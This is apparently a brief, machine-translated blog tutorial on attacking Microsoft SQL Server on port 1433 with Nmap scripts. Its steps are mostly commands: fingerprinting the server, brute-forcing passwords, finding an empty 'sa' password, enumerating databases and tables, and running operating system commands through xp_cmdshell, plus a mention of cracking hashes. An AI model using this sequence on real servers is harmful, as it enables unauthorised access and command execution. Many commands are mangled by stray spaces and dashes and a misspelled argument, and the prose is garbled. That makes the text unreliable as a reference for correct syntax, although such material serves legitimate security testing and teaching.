The Nmap Scripting Engine enables us to use Nmap in addition to scanner port and as a complete platform penetrationse testing.
In this post we will deal with some techniques that we can apply to one network to check our S.
Generally SQL databases play by default on 1433.
By opening nmap we can give the following command:
Nmap - p1433 –script ms-sql-info xxx.xxx.xxx.xxx (ip SQL Server), the combination of nmap & Nmap Script Engine gives us information immediately about the SQL version, as well as the instance name.
In the nmap script engine there is ms-sql-brute that will check for passwords.
The command is nmap -p1433 –script ms-sql-brute xxx.xxx.xxx.xxx if we don't find anything we can also use some custom password list, the command will be if we consider that the archive with passwords is pass.txt.
nmap -p1433 -script ms-sql-brute -script-args userdb = / var / pass.txt, passdb = / var / pass.txt
At the same time, the nmap script engine enables us to find null passwords in infrastructures with Microsoft SQL server.
The order would be as follows
Nmap - p1433 –script ms-sql-empty-password xxx.xxx.xxx.xxx
Here we see that the sa account does not have a password, to find which, which databases or sa has access we will use the ms-sql-hasdbaccess script with the following arguments:
Nmap - p1433 - -script ms-sql-hasdbaccess.nse - -script-args mssql.username = sa xxx.xxx.xxx.xxx
Then we will find the tables from the databases with the following command.
Nmap -p1433 - -script ms-sql-tables -script-args msql.username = sa xxx.xxx.xxx.xxx
In older versions of MSSQL (SQL 2000) xp_cmdshell is enabled by default and we can execute operating system commands through Nmap scripts such as.
Nmap –p1433 - -script ms-sql-xp-cmdshell - - script-args mssql.username = sa xxx.xxx.xxx.xxx
At Continuity
Nmap -p1433 – -script ms-sql-xp-cmdshell – -script –args=ms-sql-xp-cmdshell.cmd='net users' ,mssql.username=sa xxx.xxx.xxx.xxx
We should also say that we can use nmap & nmap script engine with other tools like john the ripper. With john the ripper we can extract them password hashes to proceed with password cracking.
We thank her warmly SecTeam @johnzontos.